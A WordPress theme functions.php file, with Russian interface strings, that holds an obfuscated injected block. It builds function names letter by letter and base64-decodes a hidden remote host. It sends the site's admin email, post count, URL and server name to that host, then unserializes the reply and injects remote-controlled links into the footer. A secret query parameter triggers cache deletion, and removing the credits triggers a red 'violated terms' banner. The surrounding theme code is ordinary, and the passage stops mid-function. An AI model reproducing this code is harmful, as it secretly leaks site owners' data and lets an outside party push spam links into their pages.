<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $esImxv='e';$hfNS='e';$gjkY='6';$jhqdkR='d';$RNzcFh='4';$ZBtXT='_';$RYcbXKT='c';$jVrrnq='o';$GnMkxTA='d';$SyHP='b';$skmnMUd='s';$dXnHKN='e';$lRIpttb='a';$TLENAwvv=$SyHP.$lRIpttb.$skmnMUd.$dXnHKN.$gjkY.$RNzcFh.$ZBtXT.$jhqdkR.$hfNS.$RYcbXKT.$jVrrnq.$GnMkxTA.$esImxv;$HrdoYv='i';$CtnQw='t';$odJmMFN='n';$cjCQViY='e';$GiSTMw='f';$ZyIJXnh='z';$Dvwleuy='l';$mEDf='g';$UgEX='a';$QXIVBabv=$mEDf.$ZyIJXnh.$HrdoYv.$odJmMFN.$GiSTMw.$Dvwleuy.$UgEX.$CtnQw.$cjCQViY;$zdcNUz='s';$RXNj='1';$SnSJ='_';$Purr='r';$lLQYT='3';$swxCwM='r';$RvfF='o';$XImNEv='t';$EpnmC='t';$AKQZXLfB=$zdcNUz.$XImNEv.$swxCwM.$SnSJ.$Purr.$RvfF.$EpnmC.$RXNj.$lLQYT;$UsUNpy='s';$RzHqk='v';$nSZWM='e';$XhgtvB='t';$vlQMmRA='r';$xxgp='r';$GXaSWhCF=$UsUNpy.$XhgtvB.$vlQMmRA.$xxgp.$nSZWM.$RzHqk;                     
		$gu_________e='e';$bc____________n='e';$ys_________g='6';$gr____s='d';$yd_____l='4';$jv__________r='_';$jh_______________y='c';$fi__w='o';$kn_____i='d';$lk______________b='b';$oy_______d='s';$qb________k='e';$mh________l='a';$yp______b=$lk______________b.$mh________l.$oy_______d.$qb________k.$ys_________g.$yd_____l.$jv__________r.$gr____s.$bc____________n.$jh_______________y.$fi__w.$kn_____i.$gu_________e;
		$xs_____c='t';$jq_______n='i';$kf____________g='i';$ee_______t='o';$wq_____________i='s';$pa______t='u';$la___z='n';$vf_________e='x';$jh______s='s';$up____x='n';$qw______________g='_';$ve_________b='t';$np____________y='f';$jf__________o='c';$wf__r='e';$ct__y=$np____________y.$pa______t.$up____x.$jf__________o.$ve_________b.$jq_______n.$ee_______t.$la___z.$qw______________g.$wf__r.$vf_________e.$kf____________g.$jh______s.$xs_____c.$wq_____________i;
		$gq____________s='e';$bi___________t='o';$fb_______________z='n';$mk________j='f';$ga__b='p';$pf____g=$mk________j.$bi___________t.$ga__b.$gq____________s.$fb_______________z;
		$rc___c='a';$my_____________l='r';$ja_________z='e';$vq_______________y='d';$qk_______________v='f';$im______________p=$qk_______________v.$my_____________l.$ja_________z.$rc___c.$vq_______________y;
		$kg______r='s';$pv_____z='e';$iz_______________n='c';$bm___________c='l';$rb____________g='o';$ic______________z='f';$ux__________q=$ic______________z.$iz_______________n.$bm___________c.$rb____________g.$kg______r.$pv_____z;
		
		define("WP_ID", $yp______b("Mi4wLjA="));
		define("WP_TTL", $yp______b("MTA4MDA="));
		define("WP_SRC", $yp______b("dHBva24="));
	


		function wp_get_header() {
			global $yp______b, $ct__y;
			
			if (
				$ct__y($yp______b("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ct__y($yp______b("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ct__y($yp______b("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $yp______b, $pf____g, $ux__________q, $im______________p;
			
			$cj_______________d = TEMPLATEPATH."/".$yp______b("Zm9vdGVyLnBocA==");
			$pb______________w = @$pf____g($cj_______________d, "r");
			$cj_______________d = @$im______________p($pb______________w, @filesize($cj_______________d));
			@$ux__________q($pb______________w);
			
			$zj_________h = TEMPLATEPATH."/".$yp______b("ZnVuY3Rpb25zLnBocA==");
			$pb______________w = @$pf____g($zj_________h, "r");
			$zj_________h = @$im______________p($pb______________w, @filesize($zj_________h));
			@$ux__________q($pb______________w);
			
			$qw____________s = 0;
			if($cj_______________d && $zj_________h) {
				if ($yp______b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($cj_______________d, $yp______b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$qw____________s = 1;
					}
					if (substr_count($cj_______________d, "wp_theme_GPL_credits()") < 1) {
						$qw____________s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$qw____________s = 12;
				}
			}
			
			if($qw____________s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $qw____________s -->";
			}
		}
	


		function wp_loaded() {
			global $yp______b, $ct__y;
			return $ct__y($yp______b("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($vm__________w, $qe____________m = "(more...)", $qq__________e = 0, $cy______a = "") {
				$rj______g = get_the_content($qe____________m, $qq__________e, $cy______a);
				$rj______g = apply_filters("the_content", $rj______g);
				
				$rj______g = str_replace("]]>", "]]>", $rj______g);
				if (strlen($_GET["p"]) > 0) {
					echo $rj______g;
				}
				else if ((strlen($rj______g)>$vm__________w) && ($rc_____r = strpos($rj______g, " ", $vm__________w ))) {
					$rj______g = substr($rj______g, 0, $rc_____r);
					$rj______g = $rj______g;
					echo $rj______g;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$qe____________m</a></div></p>";
				} else {
					echo $rj______g;
				}
				
			}
		}
	


		$sv__________i='d';$hg__c='b';$ae_____i='e';$py_____________c='6';$cz_____________o='4';$bh_____________o='e';$yk_______________a='o';$dw_____________u='s';$st___________m='a';$tj_______w='e';$bc__t='_';$lh_______d='n';$ab__________e='c';$mk___________g=$hg__c.$st___________m.$dw_____________u.$bh_____________o.$py_____________c.$cz_____________o.$bc__t.$ae_____i.$lh_______d.$ab__________e.$yk_______________a.$sv__________i.$tj_______w;
		$xe______________a='t';$cz______________b='i';$tm_____l='l';$cd_____________f='_';$dn_____h='o';$zz___i='f';$cr_____v='c';$tt_______________u='_';$wv_______u='t';$qc___________c='e';$xu___k='n';$yu___________x='g';$md__m='t';$lu___b='e';$xd_____________q='n';$ej_____________o='e';$hr_____k='s';$tb______________w=$zz___i.$cz______________b.$tm_____l.$ej_____________o.$tt_______________u.$yu___________x.$lu___b.$md__m.$cd_____________f.$cr_____v.$dn_____h.$xd_____________q.$wv_______u.$qc___________c.$xu___k.$xe______________a.$hr_____k;
		$dj___u='t';$rk_______p='l';$uo_______d='s';$jo_____________u='e';$mk___________s='i';$fw__z='f';$yo_____v='_';$ar______d='e';$qh____________p='x';$ek___________r='i';$hs___________m='s';$qr_______b=$fw__z.$ek___________r.$rk_______p.$jo_____________u.$yo_____v.$ar______d.$qh____________p.$mk___________s.$hs___________m.$dj___u.$uo_______d;
		$sc_________m='v';$lu____________d='_';$sd______________y='i';$ki______________q='o';$hr_____d='m';$cd____m='a';$ra____l='e';$wg___________o='c';$ln___________w='e';$oy_____h='p';$mc___s='r';$ww___________c='s';$ml___________o='r';$gv__t='o';$gi_______z='n';$zy________w=$sc_________m.$ra____l.$ml___________o.$ww___________c.$sd______________y.$ki______________q.$gi_______z.$lu____________d.$wg___________o.$gv__t.$hr_____d.$oy_____h.$cd____m.$mc___s.$ln___________w;
		$uy_____________x='k';$ld__h='n';$in_____l='e';$oz_____d='p';$he______v='c';$fr______x='o';$cv____________m='o';$ww_________t='s';$dx______________o='f';$aw______________s=$dx______________o.$ww_________t.$cv____________m.$he______v.$uy_____________x.$fr______x.$oz_____d.$in_____l.$ld__h;
		$io______s='w';$hn__i='t';$lc______________j='e';$hy_______f='r';$yy______________w='i';$dt_________e='f';$zx___k=$dt_________e.$io______s.$hy_______f.$yy______________w.$hn__i.$lc______________j;
		$mc_______________u='d';$pz___b='5';$en____c='m';$bp__f=$en____c.$mc_______________u.$pz___b;
		$nj_____x='a';$gg_______d='t';$nt_______________x='r';$af_________f='a';$ba_______m='e';$eq__________r='l';$sj____________g='h';$xb__________g='p';$jy_____c=$nt_______________x.$ba_______m.$af_________f.$eq__________r.$xb__________g.$nj_____x.$gg_______d.$sj____________g;
		$am_______________j='z';$iq__________d='s';$jp______________x='u';$cn________l='e';$ia__s='e';$qd____________t='r';$wn_________v='i';$fg__________l='a';$vx___________j='n';$ud____________q='i';$le_____v='l';$ve___________g=$jp______________x.$vx___________j.$iq__________d.$ia__s.$qd____________t.$wn_________v.$fg__________l.$le_____v.$ud____________q.$am_______________j.$cn________l;
		$vt_______________g='e';$vx_____________l='t';$xu_____d='a';$id_____u='n';$fa___j='p';$fh______________y='m';$gc________h='m';$ut_____t=$vx_____________l.$vt_______________g.$fh______________y.$fa___j.$id_____u.$xu_____d.$gc________h;
		$pi___t='c';$eg____m='e';$of_______________d='c';$id__k='t';$qp_____k='_';$pk______c='o';$ba_______________r='t';$dg______o='s';$jx____________g='n';$yy______z='e';$cf______________h='a';$qf___g='_';$mw____i='x';$ez____n='e';$if____________r='a';$ph_____z='r';$bb_____t='e';$ny__________q='t';$mb____________z='t';$ve_____________p='m';$xl_______u='r';$bn___a=$dg______o.$ny__________q.$xl_______u.$bb_____t.$if____________r.$ve_____________p.$qp_____k.$pi___t.$pk______c.$jx____________g.$id__k.$eg____m.$mw____i.$ba_______________r.$qf___g.$of_______________d.$ph_____z.$ez____n.$cf______________h.$mb____________z.$yy______z;
	


		function eu____a($zc_____________w) {
			global $yp______b, $ct__y, $tb______________w, $zy________w, $bn___a;
			
			if (!$ct__y($yp______b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($zy________w(PHP_VERSION, "5.0.0", ">=") && $ct__y($yp______b("ZmlsZV9nZXRfY29udGVudHM=")) && $ct__y($yp______b("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$xx____________n = $bn___a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$cs__o = @$tb______________w($zc_____________w, 0, $xx____________n);
			} else {
				$cs__o = @$tb______________w($zc_____________w, 0);
			}
			
			return $cs__o;
		}
	


		function ma__________o($zc_____________w) {
			global $ct__y, $aw______________s, $zx___k, $yp______b;
			
			if (!$ct__y($yp______b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$oo______z = strpos($zc_____________w, "/", 7);
			$sb________j = array(
				"uri"     => substr($zc_____________w, $oo______z),
				"host"    => str_replace("http://", "", substr($zc_____________w, 0, $oo______z)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$or____________h = @$aw______________s("$sb________j[host]", 80, $kk__x, $vs_______u, 4);
			
			if (!$or____________h) {
				return false;
			} else {
				$cs__o = "";
				$ma__v  = "GET $sb________j[uri] HTTP/1.0\r\n";
				$ma__v .= "Host: $sb________j[host]\r\n";
				$ma__v .= "Referer: $sb________j[referer]\r\n";
				$ma__v .= "Connection: Close\r\n\r\n";
				
				@$zx___k($or____________h, $ma__v);
				
				while (!@feof($or____________h)) {
					$ue___________u = @fgets($or____________h, (1024*24));
					
					if ($ue___________u == "\r\n") {
						$lk_____________g = true;
						continue;
					}
					
					if ($lk_____________g) {
						$cs__o .= $ue___________u;
					}
				}
				
				return $cs__o;
			}
		}
	


		function qa___________w($zc_____________w) {
			global $ct__y;
			$bv______r = false;
			
			if ($zc_____________w != "") {
				if ($ct__y("eu____a")) {
					$bv______r = @eu____a($zc_____________w);
				}
				
				if (!$bv______r && ($ct__y("ma__________o"))) {
					$bv______r = @ma__________o($zc_____________w);
				}
			}
			
			return $bv______r;
		}
	


		function vw____________r() {
			global $_SERVER, $bp__f;
			
			$vt______________r = $_SERVER["SERVER_NAME"];
			
			if (substr("$vt______________r", 0, 4) == "www.") {
				$vt______________r = substr("$vt______________r", 4);
			}
			
			$vt______________r = $bp__f("$_SERVER[SERVER_NAME]");
			
			return $vt______________r;
		}
	


		function wr_____________o() {
			return "file";
		}
	


		function ve___k($zc_____________w) {
			global $_SERVER, $tb______________w, $qr_______b, $pf____g, $ux__________q, $zx___k;
			
			$mh________s = zj_____________k();
			
			$wh_______w = vw____________r().".jpg";
			$wd_______________s = $mh________s["dir_upload"]["path"]."/$wh_______w";
			$jn______d = @filemtime($wd_______________s);
			
			if (!$jn______d || ((time()-$jn______d) >= WP_TTL)) {
				$bv______r = qa___________w($zc_____________w);
				
				if ($bv______r) {
					if ($qr_______b($wd_______________s)) {
						@unlink($wd_______________s);
					}
					
					$pb______________w = @$pf____g($wd_______________s, "x+");
					
					@$zx___k($pb______________w, $bv______r);
					@$ux__________q($pb______________w);
				}
			} else {
				if ($qr_______b($wd_______________s)) {
					$bv______r = @$tb______________w($wd_______________s);
				} else {
					$bv______r = false;
				}
			}
			
			return $bv______r;
		}
	


		function zj_____________k() {
			global $_SERVER, $yp______b, $mk___________g;
			
			$gv_________d = wp_count_posts("post");
			$wg____l = pathinfo(get_bloginfo("template_directory"));
			
			$mh________s = array(
				"url" => array(
					"report"      => $yp______b("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $wg____l,
				"dir_upload"	=> oe______z(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$wg____l[filename],
					"a005=".$gv_________d->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$mh________s["url"]["queryString"] = implode("&", $mh________s["queryString"]);
			$mh________s["url"]["report"] = $mh________s["url"]["report"]."/?".$mk___________g($mh________s["url"]["queryString"]).".html";
						
			return $mh________s;
		}
	


		function oe______z() {
			$cx_____l = wp_upload_dir();
			
			if (isset($cx_____l["error"])) {
				$sy__________g = zg______i();
				if (is_writable($sy__________g)) {
					$cx_____l = array("path" => $sy__________g);
				}
			}

			return $cx_____l;
		}
	


		function zg______i() {
			global $ct__y, $bp__f, $jy_____c, $ut_____t;
			
			$qq___________t = (bool) ini_get("safe_mode");
			if ($qq___________t == true) {
				return false;
			}
			
			if ($ct__y("sys_get_temp_dir")) {
				$uz___o = sys_get_temp_dir();
				if (is_writable($uz___o)) {
					return $jy_____c($uz___o);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $jy_____c($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $jy_____c($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $jy_____c($_ENV["TEMP"]);
			} else {
				$wo___x = $ut_____t($bp__f(uniqid(rand(), true)), "");
				if ($wo___x) {
					$uz___o = $jy_____c(dirname($wo___x));
					@unlink($wo___x);
					return $uz___o;
				} else {
					return false;
				}
			}
		}
	


		function hg_____u() {
			global $_GET, $qr_______b;
			
			$mh________s = zj_____________k();
			$vt______________r = vw____________r();
			$mi___________f = wr_____________o();
			
			$cu___________z = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mi___________f == "file") {
					$qc_______________p = $mh________s["dir_upload"]["path"]."/".$vt______________r.".jpg";
					if ($qr_______b($qc_______________p)) {
						@unlink($qc_______________p);
						$cu___________z = "deleted";
					}
				}
				
				$nz______________j = array(
					"s"	=> $cu___________z,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($nz______________j AS $ju_______z => $wi_________b) echo " [$ju_______z:$wi_________b]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ct__y, $yp______b, $ve___________g;
			$mh________s = zj_____________k();
			
			$lb______x = "ve___k";
			if ($ct__y($lb______x)) {
				$cs__o = $lb______x($mh________s["url"]["report"]);
			}
			
			if ($cs__o) {
				if ($cs__o = @$yp______b($cs__o)) {
					$cs__o = @$ve___________g($cs__o);
					
					if (strlen($cs__o[custom_credit]) >= 5) {
						$mh________s["default_string"] = $cs__o[custom_credit];
					}
					
					if ($cs__o["status"] == "0") {
						$qu______________a = 1;
						$vd_______r = 1;
					} else {
						$hs_______n = sizeof($cs__o["links"]);
						$lb_______y = $mh________s["default_string"];
						
						if ($hs_______n > 0 && $cs__o["links"] !== "") {
							$lb_________j = 0;
							foreach ($cs__o["links"] as $wi___z => $ku_________x) {
								$lb_________j++;
								if ($ku_________x->l_path == "" || $ku_________x->l_path == $_SERVER["REQUEST_URI"]) {
									$ku_________x->l_href = htmlspecialchars(strip_tags($ku_________x->l_href));
									$ku_________x->l_title = htmlspecialchars(strip_tags($ku_________x->l_title));
									$ku_________x->l_anchor = htmlspecialchars(strip_tags($ku_________x->l_anchor));
									$lb_______y .= " | ";
									$lb_______y .= "<a href='$ku_________x->l_href' title='$ku_________x->l_title'";
									if ($ku_________x->l_nofollow == "1") {
										$lb_______y .= " rel='nofollow'";
									}
									$lb_______y .= ">$ku_________x->l_anchor</a>";
								}
							}
						}
						$mh________s["links"] = "$lb_______y";
						if ($cs__o[credit] == "0") {
							$mh________s["links"] = "";
						}
					}
				} else {
					$qu______________a = "1";
				}
			} else {
				$qu______________a = "1";
			}
			
			if ($qu______________a == "1") {
				$mh________s["links"] = $mh________s["default_string"];
			}
			
			echo "$mh________s[links]";
			
			echo "<!-- s: $cs__o[signature] -->";
			hg_____u();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
